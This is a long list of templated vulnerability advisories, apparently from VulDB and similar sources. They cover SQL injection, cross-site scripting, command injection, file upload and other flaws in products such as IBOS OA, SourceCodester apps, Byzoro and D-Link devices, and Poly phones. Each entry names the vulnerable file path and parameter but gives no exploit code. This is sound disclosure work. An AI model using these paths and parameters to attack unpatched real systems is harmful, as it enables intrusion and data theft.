A vulnerability, which was classified as critical, was found in IBOS OA 4.5.5. This affects an unknown part of the file ?r=dashboard/position/del. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-239259.
A vulnerability, which was classified as critical, has been found in IBOS OA 4.5.5. Affected by this issue is some unknown functionality of the file ?r=file/dashboard/trash&amp;op=del. The manipulation of the argument fids leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-239258 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Simple Book Catalog App 1.0. Affected by this vulnerability is an unknown functionality of the file delete_book.php. The manipulation of the argument delete leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-239257 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in SourceCodester Simple Book Catalog App 1.0. Affected is an unknown function of the component Update Book Form. The manipulation of the argument book_title/book_author leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-239256.
A vulnerability was found in SourceCodester Simple Membership System 1.0. It has been rated as critical. This issue affects some unknown processing of the file delete_member.php. The manipulation of the argument mem_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-239255.
A vulnerability was found in SourceCodester Simple Membership System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file account_edit_query.php. The manipulation of the argument admin_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-239254 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Simple Membership System 1.0. It has been classified as critical. This affects an unknown part of the file club_edit_query.php. The manipulation of the argument club_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-239253 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Inventory Management System 1.0. Affected is an unknown function of the file index.php. The manipulation of the argument page leads to file inclusion. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-238638 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in Yongyou UFIDA-NC up to 20230807. This issue affects some unknown processing of the file PrintTemplateFileServlet.java. The manipulation of the argument filePath leads to path traversal. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-238637 was assigned to this vulnerability.
A vulnerability classified as critical was found in DedeCMS 5.7.110. This vulnerability affects unknown code of the file /uploads/tags.php. The manipulation of the argument tag_alias leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-238636.
A vulnerability was found in Byzoro Smart S45F Multi-Service Secure Gateway Intelligent Management Platform up to 20230822. It has been rated as critical. Affected by this issue is some unknown functionality of the file /importexport.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-238634 is the identifier assigned to this vulnerability.
A vulnerability was found in Dreamer CMS up to 4.1.3. It has been classified as problematic. Affected is an unknown function of the file /upload/ueditorConfig?action=config. The manipulation leads to files or directories accessible. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-238632. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in IBOS OA 4.5.5 and classified as critical. This issue affects some unknown processing of the file ?r=dashboard/user/export&amp;uid=X. The manipulation leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-238631. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in IBOS OA 4.5.5 and classified as critical. This vulnerability affects unknown code of the file ?r=diary/default/del of the component Delete Logs Handler. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-238630 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in IBOS OA 4.5.5. This affects an unknown part of the file ?r=email/api/delDraft&amp;archiveId=0 of the component Delete Draft Handler. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-238629 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in Byzoro Smart S85F Management Platform up to 20230820. Affected by this issue is some unknown functionality of the file /sysmanage/updateos.php. The manipulation of the argument 1_file_upload leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-238628. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely. The identifier VDB-238577 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in Xintian Smart Table Integrated Management System 5.6.9. This affects an unknown part of the file /SysManage/AddUpdateRole.aspx. The manipulation of the argument txtRoleName leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-238575. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in D-Link DAR-8000-10 up to 20230819. Affected by this issue is some unknown functionality of the file /log/decodmail.php. The manipulation of the argument file leads to os command injection. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. VDB-238574 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in TOTVS RM 12.1. Affected by this vulnerability is an unknown functionality of the component Portal. The manipulation of the argument d leads to cross site scripting. The attack can be launched remotely. The identifier VDB-238573 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in TOTVS RM 12.1. Affected is an unknown function of the file Login.aspx of the component Portal. The manipulation of the argument VIEWSTATE leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-238572. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Infosoftbd Clcknshop 1.0.0. It has been rated as critical. This issue affects some unknown processing of the file /collection/all of the component GET Parameter Handler. The manipulation of the argument tag leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-238571. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Infosoftbd Clcknshop 1.0.0. It has been declared as problematic. This vulnerability affects unknown code of the file /collection/all. The manipulation of the argument q leads to cross site scripting. The attack can be initiated remotely. VDB-238570 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
An issue was discovered in FRRouting FRR through 9.0.1. A crash can occur for a crafted BGP UPDATE message without mandatory attributes, e.g., one with only an unknown transit attribute.
KernelSU is a Kernel based root solution for Android. Starting in version 0.6.1 and prior to version 0.7.0, if a KernelSU installed device is infected with a malware whose app signing block specially constructed, it can take over root privileges on the device. The vulnerable verification logic actually obtains the signature of the last block with an id of `0x7109871a`, while the verification logic during Android installation is to obtain the first one. In addition to the actual signature upgrade that has been fixed (KSU thought it was V2 but was actually V3), there is also the problem of actual signature downgrading (KSU thought it was V2 but was actually V1). Find a condition in the signature verification logic that will cause the signature not to be found error, and KernelSU does not implement the same conditions, so KSU thinks there is a V2 signature, but the APK signature verification actually uses the V1 signature. This issue is fixed in version 0.7.0. As workarounds, keep the KernelSU manager installed and avoid installing unknown apps.
Improper Authentication vulnerability in Apereo CAS in jakarta.servlet.http.HttpServletRequest.getRemoteAddr method allows Multi-Factor Authentication bypass.This issue affects CAS: through 7.0.0-RC7. It is unknown whether in new versions the issue will be fixed. For the date of publication there is no patch, and the vendor does not treat it as a vulnerability.
A vulnerability, which was classified as critical, has been found in Bettershop LaikeTui. Affected by this issue is some unknown functionality of the file index.php?module=api&amp;action=user&amp;m=upload of the component POST Request Handler. The manipulation leads to unrestricted upload. The attack may be launched remotely. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The identifier of this vulnerability is VDB-238160.
A vulnerability classified as critical was found in SourceCodester Inventory Management System 1.0. Affected by this vulnerability is an unknown functionality of the file staff_data.php. The manipulation of the argument columns[0][data] leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-238159.
A vulnerability classified as critical has been found in SourceCodester Inventory Management System 1.0. Affected is an unknown function of the file app/ajax/search_purchase_paymen_report.php. The manipulation of the argument customer leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-238158 is the identifier assigned to this vulnerability.
A vulnerability has been found in SourceCodester Inventory Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file suppliar_data.php. The manipulation of the argument name/company leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-238153 was assigned to this vulnerability.
A vulnerability classified as critical has been found in SPA-Cart eCommerce CMS 1.9.0.3. This affects an unknown part of the file /search of the component GET Parameter Handler. The manipulation of the argument filter[brandid] leads to sql injection. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-238059.
A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.
A vulnerability was found in Byzoro Smart S85F Management Platform up to 20230816. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /sysmanage/licence.php. The manipulation leads to improper access controls. The exploit has been disclosed to the public and may be used. The identifier VDB-238057 was assigned to this vulnerability.
A vulnerability was found in IBOS OA 4.5.5. It has been classified as critical. Affected is an unknown function of the file ?r=recruit/bgchecks/export&amp;checkids=x. The manipulation leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-238056. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Byzoro Smart S85F Management Platform up to 20230809. It has been rated as problematic. This issue affects some unknown processing of the file /config/php.ini. The manipulation leads to direct request. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-238049 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in IBOS OA 4.5.5. It has been declared as critical. This vulnerability affects unknown code of the file ?r=recruit/contact/export&amp;contactids=x. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-238048. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in D-Link DAR-8000-10 up to 20230809. It has been classified as critical. This affects an unknown part of the file /app/sys1.php. The manipulation of the argument cmd with the input id leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-238047. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in NeoMind Fusion Platform up to 20230731. Affected is an unknown function of the file /fusion/portal/action/Link. The manipulation of the argument link leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-238026 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
EDK2's Network Package is susceptible to an infinite loop vulnerability when parsing unknown options in the Destination Options header of IPv6. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Availability.
OpenTelemetry-Go Contrib is a collection of third-party packages for OpenTelemetry-Go. A handler wrapper out of the box adds labels `http.user_agent` and `http.method` that have unbound cardinality. It leads to the server's potential memory exhaustion when many malicious requests are sent to it. HTTP header User-Agent or HTTP method for requests can be easily set by an attacker to be random and long. The library internally uses `httpconv.ServerRequest` that records every value for HTTP `method` and `User-Agent`. In order to be affected, a program has to use the `otelhttp.NewHandler` wrapper and not filter any unknown HTTP methods or User agents on the level of CDN, LB, previous middleware, etc. Version 0.44.0 fixed this issue when the values collected for attribute `http.request.method` were changed to be restricted to a set of well-known values and other high cardinality attributes were removed. As a workaround to stop being affected, `otelhttp.WithFilter()` can be used, but it requires manual careful configuration to not log certain requests entirely. For convenience and safe usage of this library, it should by default mark with the label `unknown` non-standard HTTP methods and User agents to show that such requests were made but do not increase cardinality. In case someone wants to stay with the current behavior, library API should allow to enable it.
A vulnerability was found in Poly Trio 8500, Trio 8800 and Trio C60. It has been classified as problematic. This affects an unknown part of the component Poly Lens Management Cloud Registration. The manipulation leads to missing authorization. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The identifier VDB-249261 was assigned to this vulnerability.
A vulnerability was found in Poly Trio 8800 7.2.6.0019 and classified as critical. Affected by this issue is some unknown functionality of the component Test Automation Mode. The manipulation leads to backdoor. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249260.
A vulnerability has been found in Poly CCX 400, CCX 600, Trio 8800 and Trio C60 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Web Interface. The manipulation leads to protection mechanism failure. The attack can be launched remotely. The vendor explains that they do not regard this as a vulnerability as this is a feature that they offer to their customers who have a variety of environmental needs that are met through different firmware builds. To avoid potential roll-back attacks, they remove vulnerable builds from the public servers as a remediation effort. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249259.
A vulnerability, which was classified as problematic, was found in Poly Trio 8300, Trio 8500, Trio 8800, Trio C60, CCX 350, CCX 400, CCX 500, CCX 505, CCX 600, CCX 700, EDGE E100, EDGE E220, EDGE E300, EDGE E320, EDGE E350, EDGE E400, EDGE E450, EDGE E500, EDGE E550, VVX 101, VVX 150, VVX 201, VVX 250, VVX 300, VVX 301, VVX 310, VVX 311, VVX 350, VVX 400, VVX 401, VVX 410, VVX 411, VVX 450, VVX 500, VVX 501, VVX 600 and VVX 601. Affected is an unknown function of the component Configuration File Import. The manipulation of the argument device.auth.localAdminPassword leads to unverified password change. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249258 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in Poly Trio 8300, Trio 8500, Trio 8800, Trio C60, CCX 350, CCX 400, CCX 500, CCX 505, CCX 600, CCX 700, EDGE E100, EDGE E220, EDGE E300, EDGE E320, EDGE E350, EDGE E400, EDGE E450, EDGE E500, EDGE E550, VVX 101, VVX 150, VVX 201, VVX 250, VVX 300, VVX 301, VVX 310, VVX 311, VVX 350, VVX 400, VVX 401, VVX 410, VVX 411, VVX 450, VVX 500, VVX 501, VVX 600 and VVX 601. This issue affects some unknown processing of the component Diagnostic Telnet Mode. The manipulation leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The identifier VDB-249257 was assigned to this vulnerability.
A vulnerability classified as problematic was found in Poly CCX 400, CCX 600, Trio 8800 and Trio C60. This vulnerability affects unknown code of the component HTTP Header Handler. The manipulation of the argument Cookie leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249256.
A vulnerability classified as problematic has been found in Poly Trio 8300, Trio 8500, Trio 8800, Trio C60, CCX 350, CCX 400, CCX 500, CCX 505, CCX 600, CCX 700, EDGE E100, EDGE E220, EDGE E300, EDGE E320, EDGE E350, EDGE E400, EDGE E450, EDGE E500, EDGE E550, VVX 101, VVX 150, VVX 201, VVX 250, VVX 300, VVX 301, VVX 310, VVX 311, VVX 350, VVX 400, VVX 401, VVX 410, VVX 411, VVX 450, VVX 500, VVX 501, VVX 600 and VVX 601. This affects an unknown part of the component Web Configuration Application. The manipulation leads to insufficiently random values. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249255.
A vulnerability was found in jeecgboot JimuReport up to 1.6.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Template Handler. The manipulation leads to injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.6.1 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-237571.
A vulnerability was found in SourceCodester Free and Open Source Inventory Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /index.php?page=member. The manipulation of the argument columns[0][data] leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-237570 is the identifier assigned to this vulnerability.
A vulnerability was found in OpenRapid RapidCMS 1.3.1 and classified as critical. This issue affects some unknown processing of the file admin/run-movepass.php. The manipulation of the argument password/password2 leads to weak password recovery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of the patch is 4dff387283060961c362d50105ff8da8ea40bcbe. It is recommended to apply a patch to fix this issue. The identifier VDB-237569 was assigned to this vulnerability.
A vulnerability has been found in OpenRapid RapidCMS 1.3.1 and classified as critical. This vulnerability affects unknown code of the file admin/article-chat.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-237568.
A vulnerability, which was classified as critical, was found in OpenRapid RapidCMS 1.3.1. This affects an unknown part of the file template/default/category.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-237567.
A vulnerability, which was classified as critical, has been found in Mini-Tmall up to 20230811. Affected by this issue is some unknown functionality of the file product/1/1?test=1&amp;test2=2&amp;. The manipulation of the argument orderBy leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237566 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Free Hospital Management System for Small Practices 1.0. Affected by this vulnerability is an unknown functionality of the file vm\patient\edit-user.php. The manipulation of the argument id00/nic/oldemail/email/spec/Tele leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-237565 was assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Free Hospital Management System for Small Practices 1.0/5.0.12. Affected is an unknown function of the file vm\doctor\edit-doc.php. The manipulation of the argument id00/nic/oldemail/email/spec/Tele leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-237564.
A vulnerability was found in SourceCodester Free Hospital Management System for Small Practices 1.0. It has been rated as critical. This issue affects some unknown processing of the file \vm\patient\booking-complete.php. The manipulation of the argument userid/apponum/scheduleid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-237563.
A vulnerability was found in SourceCodester Free Hospital Management System for Small Practices 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /patient/appointment.php. The manipulation of the argument sheduledate leads to sql injection. The attack can be initiated remotely. VDB-237562 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Free Hospital Management System for Small Practices 1.0. It has been classified as critical. This affects an unknown part of the file appointment.php. The manipulation of the argument sheduledate leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-237561 was assigned to this vulnerability.
ZITADEL provides identity infrastructure. In versions 2.37.2 and prior, ZITADEL administrators can enable a setting called "Ignoring unknown usernames" which helps mitigate attacks that try to guess/enumerate usernames. While this settings was properly working during the authentication process it did not work correctly on the password reset flow. This meant that even if this feature was active that an attacker could use the password reset function to verify if an account exist within ZITADEL. This bug has been patched in versions 2.37.3 and 2.38.0. No known workarounds are available.
A vulnerability was found in SourceCodester Card Holder Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the component Minus Value Handler. The manipulation leads to improper validation of specified quantity in input. The attack may be launched remotely. The identifier of this vulnerability is VDB-237560.
A vulnerability has been found in SourceCodester Inventory Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file app/ajax/search_sales_report.php. The manipulation of the argument customer leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-237559.
A vulnerability, which was classified as critical, was found in SourceCodester Inventory Management System 1.0. Affected is an unknown function of the file app/ajax/search_sell_paymen_report.php. The manipulation of the argument customer leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-237558 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Inventory Management System 1.0. This issue affects some unknown processing of the file app/action/edit_update.php. The manipulation of the argument user_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-237557 was assigned to this vulnerability.
A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Byzoro Smart S85F Management Platform up to 20230807. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /log/decodmail.php. The manipulation of the argument file leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-237517 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in NBS&amp;HappySoftWeChat 1.1.6. Affected by this issue is some unknown functionality. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-237512.
A vulnerability classified as critical was found in Codecanyon Credit Lite 1.5.4. Affected by this vulnerability is an unknown functionality of the file /portal/reports/account_statement of the component POST Request Handler. The manipulation of the argument date1/date2 leads to sql injection. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-237511.
A vulnerability was found in Control iD Gerencia Web 1.30 and classified as problematic. Affected by this issue is some unknown functionality of the component Cookie Handler. The manipulation leads to cleartext storage of sensitive information. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-237380. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in MaximaTech Portal Executivo 21.9.1.140 and classified as problematic. This vulnerability affects unknown code of the component Cookie Handler. The manipulation leads to missing encryption of sensitive data. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-237316. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in MicroWorld eScan Anti-Virus 7.0.32 on Linux. This affects an unknown part of the file runasroot. The manipulation leads to incorrect execution-assigned permissions. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-237315. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in tdevs Hyip Rio 2.1. Affected by this issue is some unknown functionality of the file /user/settings of the component Profile Settings. The manipulation of the argument avatar leads to cross site scripting. The attack may be launched remotely. VDB-237314 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
OpenTelemetry, also known as OTel for short, is a vendor-neutral open-source Observability framework for instrumenting, generating, collecting, and exporting telemetry data such as traces, metrics, logs. Autoinstrumentation out of the box adds the label `http_method` that has unbound cardinality. It leads to the server's potential memory exhaustion when many malicious requests are sent. HTTP method for requests can be easily set by an attacker to be random and long. In order to be affected program has to be instrumented for HTTP handlers and does not filter any unknown HTTP methods on the level of CDN, LB, previous middleware, etc. This issue has been patched in version 0.41b0.
A vulnerability was found in phpRecDB 1.3.1. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument r/view leads to cross site scripting. The attack may be launched remotely. VDB-237194 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Common Voice is the web app for Mozilla Common Voice, a platform for collecting speech donations in order to create public domain datasets for training voice recognition-related tools. Version 1.88.2 is vulnerable to reflected Cross-Site Scripting given that user-controlled data flows to a path expression (path of a network request). This issue may lead to reflected Cross-Site Scripting (XSS) in the context of Common Voice&amp;#8217;s server origin. As of time of publication, it is unknown whether any patches or workarounds exist.
quinn-proto is a state machine for the QUIC transport protocol. Prior to versions 0.9.5 and 0.10.5, receiving unknown QUIC frames in a QUIC packet could result in a panic. The problem has been fixed in 0.9.5 and 0.10.5 maintenance releases.
A vulnerability was found in SourceCodester Doctors Appointment System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument useremail leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-236365 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Inventory Management System 1.0 and classified as critical. This issue affects some unknown processing of the file ex_catagory_data.php. The manipulation of the argument columns[1][data] leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-236291.
A vulnerability has been found in SourceCodester Inventory Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file product_data.php.. The manipulation of the argument columns[1][data] leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-236290 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Inventory Management System 1.0. This affects an unknown part of the file catagory_data.php. The manipulation of the argument columns[1][data] leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-236289 was assigned to this vulnerability.
A vulnerability has been found in SourceCodester Resort Reservation System 1.0 and classified as critical. This vulnerability affects unknown code of the file view_fee.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-236236.
A vulnerability, which was classified as critical, was found in SourceCodester Resort Reservation System 1.0. This affects an unknown part of the file manage_user.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-236235.
A vulnerability, which was classified as critical, has been found in SourceCodester Resort Reservation System 1.0. Affected by this issue is some unknown functionality of the file index.php. The manipulation of the argument page leads to file inclusion. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-236234 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Pharmacy Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file manage_website.php. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-236221 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Hospital Management System 1.0. It has been classified as critical. Affected is an unknown function of the file patientlogin.php. The manipulation of the argument loginid/password leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-236220.
A vulnerability was found in SourceCodester Inventory Management System 1.0 and classified as critical. This issue affects some unknown processing of the file sell_return.php. The manipulation of the argument pid leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-236219.
A vulnerability has been found in SourceCodester Inventory Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file edit_update.php of the component Password Handler. The manipulation of the argument user_id leads to improper access controls. The attack can be initiated remotely. VDB-236218 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Inventory Management System 1.0. This affects an unknown part of the file edit_sell.php. The manipulation of the argument up_pid leads to sql injection. It is possible to initiate the attack remotely. The identifier VDB-236217 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Free Hospital Management System for Small Practices 1.0. Affected by this issue is some unknown functionality of the file /vm/admin/delete-doctor.php?id=2 of the component Redirect Handler. The manipulation leads to enforcement of behavioral workflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-236216.
A vulnerability classified as critical was found in SourceCodester Free Hospital Management System for Small Practices 1.0. Affected by this vulnerability is an unknown functionality of the file /vm/login.php. The manipulation of the argument useremail/userpassword leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-236215.
A vulnerability classified as critical has been found in SourceCodester Free Hospital Management System for Small Practices 1.0. Affected is an unknown function of the file /vm/doctor/doctors.php?action=view. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-236214 is the identifier assigned to this vulnerability.
A vulnerability was found in EmpowerID up to 7.205.0.0. It has been rated as problematic. This issue affects some unknown processing of the component Multi-Factor Authentication Code Handler. The manipulation leads to information disclosure. The complexity of an attack is rather high. The exploitation is known to be difficult. Upgrading to version 7.205.0.1 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-236213 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Hospital Management System 1.0. It has been classified as critical. This affects an unknown part of the file appointmentapproval.php. The manipulation of the argument time leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-236211.
A vulnerability was found in mooSocial mooTravel 3.1.8 and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to cross site scripting. The attack may be launched remotely. VDB-236210 is the identifier assigned to this vulnerability.
A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely. The identifier VDB-236209 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index. The manipulation of the argument q leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-236208.
